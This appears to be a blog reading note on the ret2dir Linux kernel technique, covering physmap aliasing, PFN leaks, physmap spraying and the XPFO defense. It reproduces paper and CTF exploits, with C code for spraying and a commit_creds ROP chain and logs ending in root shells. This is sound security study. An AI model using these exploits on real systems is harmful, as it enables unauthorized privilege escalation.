1. Introduction

We have learned some kernel PWN techniques and cases before. Exploitation and mitigation bypassing are always charming, while mitigations keep evolving as well. In this post, we will talk about the ret2dir technique, which leverages physmap to place an attacker-controlled payload in the kernel, bypassing existing ret2usr defenses like SMEP, SMAP, PXN, KERNEXEC, UDEREF and kGuard.

ret2dir was first published by Vasileios P. Kemerlis, Michalis Polychronakis and Angelos D. Keromytis in their paper in 2014. Hence, this post also serves as a reading note for this paper.

After ret2dir was published, some articles (e.g., this one and this one) pointed out that it is not a big threat. Their arguments are:

  1. x86 (v4.6) and arm64 (v4.9) have made all kernel memory W^X, which means attackers can no longer execute shellcode located in physmap in kernel context; they can only place a ROP chain there.
  2. As one of the article authors said, even on kernels <= 3.9, a kernel patched with PaX/grsecurity can prevent ret2dir attacks without enabling any extra features.
  3. The full ret2dir attack relies on page frame number (PFN) information, but since Linux 4.0 only users with the CAP_SYS_ADMIN capability can get PFNs from /proc/<pid>/pagemap.

The original ret2dir may not work on up-to-date hosts. However, physmap spraying is still effective in some situations, and ret2dir is worth learning about anyway.

BTW, grsecurity-101-tutorials is a great repository where you can learn a lot about Linux kernel security.

2. Paper Information

Meta Info
Title: ret2dir: Rethinking Kernel Isolation
Author(s): Vasileios P. Kemerlis, Michalis Polychronakis, Angelos D. Keromytis
Institution(s): Columbia University
Published in: 23rd USENIX Security Symposium (2014)
Link: USENIX

BTW, ret2dir was also presented at Black Hat Europe 2014.

3. What ret2dir is

ret2dir is not difficult to understand. However, it helps to first talk about ret2usr, one of the best-known Linux kernel exploitation techniques. As the slides by Vasileios P. Kemerlis show, the idea of ret2usr dates back to at least 1978, when Gerald J. Popek and David A. Farber wrote in a paper published in Communications of the ACM:

Control was therefore returned to user code at his virtual location zero–in privileged mode!

That’s it! In ret2usr, attackers hijack code or data pointers so that they point to attacker-controlled memory in user space, and then execute the malicious code (or use the malicious data) located there in kernel context. As a result, many mitigations like SMEP, SMAP, PXN, KERNEXEC, UDEREF and kGuard have been proposed to make ret2usr fail.

One general idea to bypass these mitigations is to place the payload legitimately in kernel address space, since few of the mitigations above prevent dereferencing pointers into kernel space. Following this idea, a common approach is to deliver the payload into a buffer on the kernel stack or heap via system calls. In this case, attackers must be able to leak a stack or heap address when KASLR is enabled.

Another way to place payload in kernel space is ret2dir. Note that many other ways could work as well, but let’s focus on ret2dir in this post.

According to the related paper, ret2dir (return-to-direct-mapped memory) leverages a kernel region that directly maps part or all of a system’s physical memory to bypass existing ret2usr protections, enabling attackers to essentially “mirror” user-space data within the kernel address space.

On Linux, such a region is called physmap, which can be found in the Linux virtual memory map:

[Figure: Linux virtual memory map with the physmap region]

As the diagram shows, physmap is a large, contiguous virtual memory region inside the kernel address space that contains a direct mapping of part or all (depending on the architecture) of physical memory, resulting in address aliasing: the memory of an attacker-controlled user process is also accessible through its kernel-resident synonym. What's more, at the time of the paper, the mapping of physical memory started at a fixed, known location, regardless of KASLR (later kernels can randomize it with CONFIG_RANDOMIZE_MEMORY). On x86-64 systems, physmap maps the entire RAM of the system 1:1 into a 64TB region, starting from page frame zero. The situation is different on 32-bit architectures.

The demonstrations and comparison of ret2usr and ret2dir are shown below (excerpted from the paper):

[Figure: ret2usr vs. ret2dir, excerpted from the paper]

The paper also notes that on x86, physmap is mapped RW in all kernel versions, while on x86-64, physmap is RWX up to kernel v3.8.13 and only very recent kernels (≥ v3.9, at the time of writing) use an RW mapping.

4. How ret2dir works

To mount a ret2dir attack, the first step is to map the exploit payload into user space. Once a page frame is given to the attacking process to back that memory, the malicious payload also appears in kernel space, at the frame's physmap synonym.
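A minimal C sketch of this first step, assuming an x86-64 Linux process and 4KB pages (the helper name `map_payload` is our own, hypothetical choice): the payload is copied into a freshly mmap-ed anonymous page. Anonymous memory is allocated lazily, so it is the first write that makes the kernel assign a page frame; from then on the same bytes are also visible at that frame's physmap address.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE_SIZE_4K 4096

/* Hypothetical helper: map one anonymous page and copy the payload into it.
 * The memcpy is the first write to the page, so the kernel must back it with
 * a page frame; that frame's physmap synonym then holds the same bytes.
 * Returns NULL on failure or if the payload does not fit in one page. */
void *map_payload(const void *payload, size_t len)
{
    if (len > PAGE_SIZE_4K)
        return NULL;

    void *page = mmap(NULL, PAGE_SIZE_4K, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return NULL;

    memcpy(page, payload, len); /* first write: page frame gets allocated */
    return page;
}
```

A real exploit would call this for each payload copy, or spray many such pages when the synonym address cannot be computed directly.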

Naturally, the next critical question is how to locate the synonym address in kernel space. If we can pinpoint the payload in kernel space, the rest of the exploitation is similar to common kernel PWNs.

The paper proposes two ways. The first is to read page frame information from Procfs. The second is to spray as many copies of the payload as possible in user space, so that a chosen kernel address in physmap contains the payload with high probability. As mentioned before, since Linux 4.0 only users with the CAP_SYS_ADMIN capability can get PFNs from Procfs, so the latter is the only feasible way for unprivileged attackers to conduct ret2dir now.

BTW, in this post we concentrate on the x86-64 Linux environment.

4.1 Leak PFNs via Procfs

As reading PFNs from Procfs is no longer permitted without the CAP_SYS_ADMIN capability, we will only introduce this technique briefly.

For each user-space page, /proc/<pid>/pagemap provides a 64-bit value, indexed by virtual page number, whose bits [0:54] encode the page frame number (when the page is present). Based on these numbers, we can calculate the synonym address of a given user-space virtual address:

PFN(uaddr) = pagemap[(uaddr / 4096) * sizeof(uint64_t)][0:54]
SYN(uaddr) = PHYS_OFFSET + 4096 * (PFN(uaddr) - PFN_MIN)
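A minimal sketch of these two formulas in C, assuming 4KB pages. The entry layout (PFN in bits 0-54, "present" flag in bit 63) follows the kernel's pagemap documentation; the macro and function names are our own. On the x86-64 kernels used by the paper, physmap started at page frame zero, so PFN_MIN is 0 and PHYS_OFFSET was 0xffff880000000000; under that layout, the exploit log in Section 6.1 that maps 0x7f1f27bc9000 to 0xffff88003613a000 corresponds to PFN 0x3613a.

```c
#include <stdint.h>

#define PAGE_SHIFT_4K     12
#define PAGEMAP_PFN_MASK  ((UINT64_C(1) << 55) - 1) /* bits 0-54: PFN */
#define PAGEMAP_PRESENT   (UINT64_C(1) << 63)       /* bit 63: page present */

/* Byte offset of the entry for uaddr in /proc/<pid>/pagemap:
 * (uaddr / 4096) * sizeof(uint64_t). */
static inline uint64_t pagemap_offset(uint64_t uaddr)
{
    return (uaddr >> PAGE_SHIFT_4K) * sizeof(uint64_t);
}

/* PFN(uaddr): bits [0:54] of the entry, or 0 if the page is not present. */
static inline uint64_t pagemap_pfn(uint64_t entry)
{
    return (entry & PAGEMAP_PRESENT) ? (entry & PAGEMAP_PFN_MASK) : 0;
}

/* SYN(uaddr) = PHYS_OFFSET + 4096 * (PFN(uaddr) - PFN_MIN),
 * plus the offset of uaddr within its page. */
static inline uint64_t physmap_synonym(uint64_t pfn, uint64_t phys_offset,
                                       uint64_t pfn_min, uint64_t uaddr)
{
    return phys_offset + ((pfn - pfn_min) << PAGE_SHIFT_4K) + (uaddr & 0xfff);
}
```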

The getpmap.c program demonstrates how to calculate PFN(uaddr). As shown below, it failed to leak PFN without CAP_SYS_ADMIN:

➜  ~ id
uid=1000(rambo) gid=1000(rambo) groups=1000(rambo)
➜  ~ cat /proc/$$/maps | grep "/usr/bin/zsh" | head -n 1
55ab0e776000-55ab0e78d000 r--p 00000000 fc:01 73384                      /usr/bin/zsh
➜  ~ ./getpmap --pid=$$ --virt=0x55ab0e776000
PFN[0x55ab0e776000]: 0
➜  ~ sudo ./getpmap --pid=$$ --virt=0x55ab0e776000
PFN[0x55ab0e776000]: 1216935
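The original getpmap.c is not reproduced in this post. As a hypothetical stand-in, the following minimal reader opens /proc/<pid>/pagemap, reads the entry for a virtual address with pread, and extracts the PFN; the function names are our own. Per the kernel's pagemap documentation, unprivileged opens fail with EPERM on Linux 4.0 and 4.1, and from 4.2 on the PFN field simply reads as zero, which matches the transcript above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Read the raw 64-bit pagemap entry that covers vaddr in process pid
 * (pid <= 0 selects the calling process). Returns 0 on success, -1 on error. */
int read_pagemap_entry(pid_t pid, uintptr_t vaddr, uint64_t *entry)
{
    char path[64];
    if (pid > 0)
        snprintf(path, sizeof(path), "/proc/%d/pagemap", (int)pid);
    else
        snprintf(path, sizeof(path), "/proc/self/pagemap");

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1; /* e.g. EPERM on Linux 4.0/4.1 without CAP_SYS_ADMIN */

    long page_size = sysconf(_SC_PAGESIZE);
    off_t off = (off_t)(vaddr / (uintptr_t)page_size) * (off_t)sizeof(uint64_t);
    ssize_t n = pread(fd, entry, sizeof(*entry), off);
    close(fd);
    return n == (ssize_t)sizeof(*entry) ? 0 : -1;
}

/* Extract the PFN (bits 0-54) if the page is present (bit 63).
 * Since Linux 4.2 this reads as 0 without CAP_SYS_ADMIN. */
uint64_t pagemap_entry_pfn(uint64_t entry)
{
    if (!(entry >> 63))
        return 0;
    return entry & ((UINT64_C(1) << 55) - 1);
}
```

Calling read_pagemap_entry() on a page that has already been written to and printing pagemap_entry_pfn() of the result should give 0 for an unprivileged user and a real PFN when run with sudo.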

4.2 physmap Spraying

If attackers cannot get the information needed to locate the synonym address in kernel space, spraying may work. It is very similar to other spraying techniques, e.g., heap spraying. The attacker picks an arbitrary physmap address and tries to ensure that the corresponding page frame backs a user page containing the payload. This can be achieved by filling the address space of the attacking process with copies of the payload.
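A minimal sketch of the spraying step, assuming 4KB pages; `physmap_spray` is a hypothetical helper. It uses a single large anonymous mapping with MAP_POPULATE (a Linux mmap flag that pre-faults the mapping) rather than one mmap per page; either way, every sprayed page ends up backed by its own page frame with the payload at its start.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: fill npages fresh user pages with copies of payload,
 * placed at the start of every page. MAP_POPULATE asks the kernel to allocate
 * the page frames up front; the memcpy loop would fault them in anyway.
 * Returns the base of the sprayed region, or NULL on failure. */
void *physmap_spray(const void *payload, size_t len, size_t npages)
{
    const size_t page = 4096;
    if (len == 0 || len > page || npages == 0)
        return NULL;

    char *base = mmap(NULL, npages * page, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    if (base == MAP_FAILED)
        return NULL;

    for (size_t i = 0; i < npages; i++)
        memcpy(base + i * page, payload, len);
    return base;
}
```

The exploit in Section 6.2 uses one mmap call per page instead; this sketch makes no attempt to control which physical frames the kernel picks.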

The paper introduces some optimizations (e.g., excluding page frames that the buddy allocator never allocates to user space) to increase the hit rate, which can reach as high as 96%.
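To see why excluding frames helps, consider a deliberately simplified model (our own assumption for illustration, not the paper's analysis): if sprayed pages land uniformly at random among the page frames that can back user memory, and the target physmap page is chosen among those frames, the chance that it holds the payload is roughly

```latex
P_{\text{hit}} \approx \frac{N_{\text{spray}}}{N_{\text{frames}} - N_{\text{excluded}}}
```

where N_spray is the number of sprayed pages, N_frames is the total number of page frames, and N_excluded is the number of frames the buddy allocator never gives to user space. Shrinking the denominator raises the estimate for the same spray size.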

4.3 The Rest of Exploitation

If physmap is executable, attackers can simply place shellcode there and then hijack the control flow. If it is non-executable, ROP is needed: the control flow is first hijacked to a stack pivoting gadget, which points the kernel stack pointer at the ROP chain in physmap.
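To make the ROP case concrete, here is a hedged sketch of writing a classic commit_creds(prepare_kernel_cred(0)) chain into a buffer that would then be sprayed into physmap. All addresses in `struct rop_gadgets` are hypothetical placeholders that must be resolved for the target kernel (and adjusted for KASLR); in particular, a clean `mov rdi, rax; ret` gadget is an assumption, since real kernels often only offer variants with side effects. The two padding words after the return-to-user trampoline are also an assumption tied to one specific trampoline.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, already KASLR-adjusted kernel addresses. */
struct rop_gadgets {
    uint64_t pop_rdi_ret;         /* pop rdi; ret */
    uint64_t prepare_kernel_cred;
    uint64_t mov_rdi_rax_ret;     /* mov rdi, rax; ret (assumed to exist) */
    uint64_t commit_creds;
    uint64_t kpti_trampoline;     /* returns to user mode via swapgs/iretq */
};

/* User-mode state saved before the attack and consumed by iretq. */
struct user_state {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Write the chain into chain[] (capacity cap qwords). After the stack pivot,
 * rsp points at chain[0]. Returns the number of qwords written, or 0 if
 * cap is too small. */
size_t build_rop_chain(uint64_t *chain, size_t cap,
                       const struct rop_gadgets *g, const struct user_state *u)
{
    const uint64_t words[] = {
        g->pop_rdi_ret, 0,          /* rdi = NULL */
        g->prepare_kernel_cred,     /* rax = new cred */
        g->mov_rdi_rax_ret,         /* rdi = rax */
        g->commit_creds,            /* install the new cred */
        g->kpti_trampoline,
        0, 0,                       /* padding popped by the trampoline (assumed) */
        u->rip, u->cs, u->rflags, u->rsp, u->ss,  /* iretq frame */
    };
    size_t n = sizeof(words) / sizeof(words[0]);
    if (cap < n)
        return 0;
    for (size_t i = 0; i < n; i++)
        chain[i] = words[i];
    return n;
}
```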

5. Defense: eXclusive Page Frame Ownership (XPFO)

To mitigate ret2dir, the paper's authors designed an eXclusive Page Frame Ownership (XPFO) scheme for the Linux kernel. The idea is to prevent page frames from being assigned to both kernel and user space, unless a kernel component explicitly requests that.

As the paper wrote, XPFO introduces a minimal overhead ranging between 0.18–2.91%. The implementation of XPFO can be found here.
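To illustrate the ownership rule, here is a toy model in C (our own simplification, not the actual XPFO patch) that tracks, for one page frame, who owns it and whether its physmap synonym is currently mapped. Under this model, a frame handed to user space is unreachable through physmap unless a kernel component explicitly maps it, which is what defeats ret2dir.

```c
#include <stdbool.h>

/* Toy model of XPFO's ownership rule; not the real kernel implementation. */
enum frame_owner { FRAME_FREE, FRAME_KERNEL, FRAME_USER };

struct page_frame {
    enum frame_owner owner;
    bool physmap_mapped; /* is this frame's physmap synonym currently mapped? */
};

/* Frame handed to user space: drop its physmap synonym so a hijacked kernel
 * pointer into physmap no longer reaches user-controlled bytes.
 * (A real implementation must also flush the corresponding TLB entries.) */
void xpfo_alloc_user(struct page_frame *f)
{
    f->owner = FRAME_USER;
    f->physmap_mapped = false;
}

/* Frame used by the kernel itself keeps its physmap mapping. */
void xpfo_alloc_kernel(struct page_frame *f)
{
    f->owner = FRAME_KERNEL;
    f->physmap_mapped = true;
}

/* Explicit, temporary kernel access to a user frame (kmap-style). */
void xpfo_kmap(struct page_frame *f) { f->physmap_mapped = true; }

void xpfo_kunmap(struct page_frame *f)
{
    if (f->owner == FRAME_USER)
        f->physmap_mapped = false;
}

/* When the frame is freed, it goes back to the kernel and is mapped again. */
void xpfo_free(struct page_frame *f)
{
    f->owner = FRAME_FREE;
    f->physmap_mapped = true;
}

bool synonym_reachable(const struct page_frame *f) { return f->physmap_mapped; }
```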

6. Reproduction

The original ret2dir does not work on later kernels, while the physmap spraying technique still works in some situations. Hence, in this section we first reproduce some cases from the paper, and then apply physmap spraying to a kernel PWN challenge we solved before.

6.1 Reproduce Experiments in the Paper

The paper's authors conducted their experiments in virtual machines and shared these machines online. Thanks to them and to virtualization technology, we can download the whole experiment environment and reproduce all the experiments 9 years later with little effort. In this part, we download the 64-bit virtual machine and reproduce the exploitation.

Boot the virtual machine, and you will see options for different kernel environments with intuitive names:

[Figure: VM boot menu listing the kernel environments]

Let’s take CVE-2013-2094 (OOB) for example.

With SMEP disabled (the third option), ret2usr works:

Searchin...
detected CONFIG_JUMP_LABEL
perf_swevent_enabled is at 0xffffffff81ef7180
IDT at 0xffffffff81df8000
Using interrupt 4
Shellcode at 0x81000000
Triggering sploit
Got signal
Launching shell
# 

With SMEP enabled (the first option), ret2usr fails and the kernel crashes.

With SMEP enabled (the first option), ret2dir succeeds in escalating privileges:

[^] Linux kernel `PERF_EVENTS' (CVE-2013-2094) exploit
    by Vasileios P. Kemerlis (vpk)
[+] `perf_swevent_enabled[]' is located at 0xffffffff81ef7180
[+] `&apparmor_ops.shm_shmat' is located at 0xffffffff81c71aa8
[+] `perf_swevent_enabled[0xfffffffffffe51b7]=&apparmor_ops.shm_shmat'
[+] `apparmor_ops.shm_shmat=0xffffffff812db050'
[+] target address is 0xffffffff81304e62 (diff: 0x29e12)
[?] check if we have (at least) 171538 (0x29e12) file descriptors available
[?] check if we can spawn enough child processes
[+] forking 167 processes...(done)
[+] invoking `perf_swevent_init()' x171538...(done)
[+] try to map a proper synonym page
[?] 0x7f1f27bc9000 is kernel-mapped at 0xffff88003613a000
[?] 0x7f1f27bc8000 is kernel-mapped at 0xffff880027edf000
[+] shellcode stitching (0x7f1f27bc8000 <-> 0xffff880027edf000)
[+] elevate privileges (w/out touching user space)
[+] invoking `perf_swevent_destroy()' x171538...(done)
[*] Got r00t!
# 

Note that in the ret2dir case, SMAP and KASLR are disabled. The ExP directly leaks PFNs via Procfs and hijacks the control flow to shellcode in physmap, without using ROP. Another ExP, for CVE-2010-3904, places a ROP chain in physmap to escalate privileges.

6.2 Rewrite Former ExP with physmap Spraying

In this part, we will try out the physmap spraying technique on a kernel PWN challenge we solved before, which has a heap-based OOB bug (you can find the original ExP here).

We will place the ROP chain in physmap instead of in the victim driver's buffer, and then pivot the kernel stack to our ROP chain.

Following an article, we place some probe strings in the mmap-ed pages to facilitate debugging. After debugging the kernel with GDB, we find that the first page containing the probe string is located before the g_buf buffer in the slab. The address is not fixed across boots: it was 0xffff888001a39000 once and 0xffff888001a37000 another time. g_buf is something like 0xffff8880030d9000, which may change as well.

With these findings, if we spray 64MB in physmap, the end of the sprayed memory should be near 0xffff888005a30000, which means that g_buf lies between the first and the last sprayed page. This is very useful: we can simply add an offset to the leaked g_buf address to get the address of a page that likely contains our payload. After testing, we find that g_buf + 16MB is a good candidate.
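The arithmetic behind this choice can be checked with a small sketch using the addresses observed above. As a simplification, it assumes the 64MB of sprayed pages occupy one contiguous window in physmap starting at the first probe page; in practice the frames are only roughly contiguous, which is why testing was needed. The helper names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define SPRAY_SIZE   (64ULL << 20)   /* 16*1024 pages * 4KB */
#define GUESS_OFFSET (16ULL << 20)   /* g_buf + 16MB */
#define PAGE_MASK_4K (~0xfffULL)

/* Candidate page that should hold the ROP chain: page-aligned g_buf + 16MB. */
static uint64_t guess_payload_page(uint64_t g_buf)
{
    return (g_buf & PAGE_MASK_4K) + GUESS_OFFSET;
}

/* Assuming the sprayed pages occupy [first, first + 64MB) in physmap,
 * check whether addr falls inside that window. */
static bool in_spray_window(uint64_t addr, uint64_t first_sprayed_page)
{
    return addr >= first_sprayed_page && addr < first_sprayed_page + SPRAY_SIZE;
}
```

For g_buf = 0xffff8880030d9000 the guess is 0xffff8880040d9000, about 38MB past either observed first probe page and therefore inside the assumed window for both boots.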

Now we can give it a try. The main modification to the original ExP is shown below:

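printf("[*] spraying 16*1024 pages containing ROP chain in physmap\n");
void *physmap_spray[16*1024];
void *mp;
for (int i = 0; i < 16*1024; i++) { // 16*1024 pages * 4KB = 64MB
    mp = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mp == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }
    // writing the ROP chain faults the page in, so its page frame
    // (and thus its physmap synonym) now holds the payload
    memcpy(mp, buf, 0x500);
    physmap_spray[i] = mp;
}
// guess: the page 16MB after g_buf falls inside the sprayed range
uint64_t physmap_ptr = (g_buf & 0xfffffffffffff000) + 16*1024*1024;
printf("[*] assuming page at g_buf+16MB (0x%lx) contains ROP chain\n", physmap_ptr);
printf("[*] invoking ioctl to hijack control flow\n");
// trigger the overwritten tty_struct; the -0x10 adjustment is kept
// from the original exploit's stack pivot
for (int i = 0; i < SPRAY_NUM; i++)
    ioctl(spray[i], 0xdeadbeef, physmap_ptr - 0x10);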

You can find the modified ExP based on physmap spraying here. The whole exploit process is shown below:

/ $ /exploit
[*] saving user land state
[*] spraying 50 tty_struct objects
[+] /dev/holstein opened
[*] spraying 50 tty_struct objects
[*] leaking kernel base and g_buf with OOB read
[+] leaked kernel base address: 0xffffffff81000000
[+] leaked g_buf address: 0xffff8880030d9000
[*] crafting rop chain
[*] overwriting the adjacent tty_struct
[*] spraying 16*1024 pages containing ROP chain in physmap
[*] assuming page at g_buf+16MB (0xffff8880040d9000) contains ROP chain
[*] invoking ioctl to hijack control flow
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0(root) gid=0(root)

BTW, if you have an arbitrary address read (AAR) primitive, you can simply search physmap for the target page, starting from a known slab address or elsewhere. However, such a primitive is not available in many OOB cases.
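A sketch of such a search, assuming a hypothetical arbitrary-read primitive `read64` (how it is built depends entirely on the bug) and a 64-bit probe value written at the start of every sprayed page. The scan is bounded by `max_pages`, since reading past the end of RAM in physmap could fault in kernel context.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical arbitrary-address-read primitive: returns the 8 bytes at kaddr. */
typedef uint64_t (*aar64_fn)(uint64_t kaddr);

/* Scan up to max_pages physmap pages, starting at the page containing start,
 * for a page whose first 8 bytes equal marker. Returns its address or 0. */
uint64_t find_marker_page(uint64_t start, size_t max_pages,
                          uint64_t marker, aar64_fn read64)
{
    uint64_t page = start & ~UINT64_C(0xfff);
    for (size_t i = 0; i < max_pages; i++, page += 4096) {
        if (read64(page) == marker)
            return page;
    }
    return 0;
}
```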

7. Summary

In this post, we learned the ret2dir technique, which can be used to deliver shellcode or a ROP chain into kernel space. Although the original technique is mitigated by several defenses today, physmap spraying still works well with ROP in some situations.

Another paper, by Xu et al. (2015), is highly recommended; it discusses physmap-based exploitation of UAF vulnerabilities in depth. I translated this paper into Chinese three years ago. Based on these two papers, physmap spraying can be used in at least two ways:

  1. Place a ROP chain. You can choose physmap whenever you need an area to place a ROP chain.
  2. Create a collision to overwrite a victim object. This is for UAF vulnerabilities.

PWN is so charming that there are always new offensive and defensive techniques, and infinite possibilities. Keep hacking!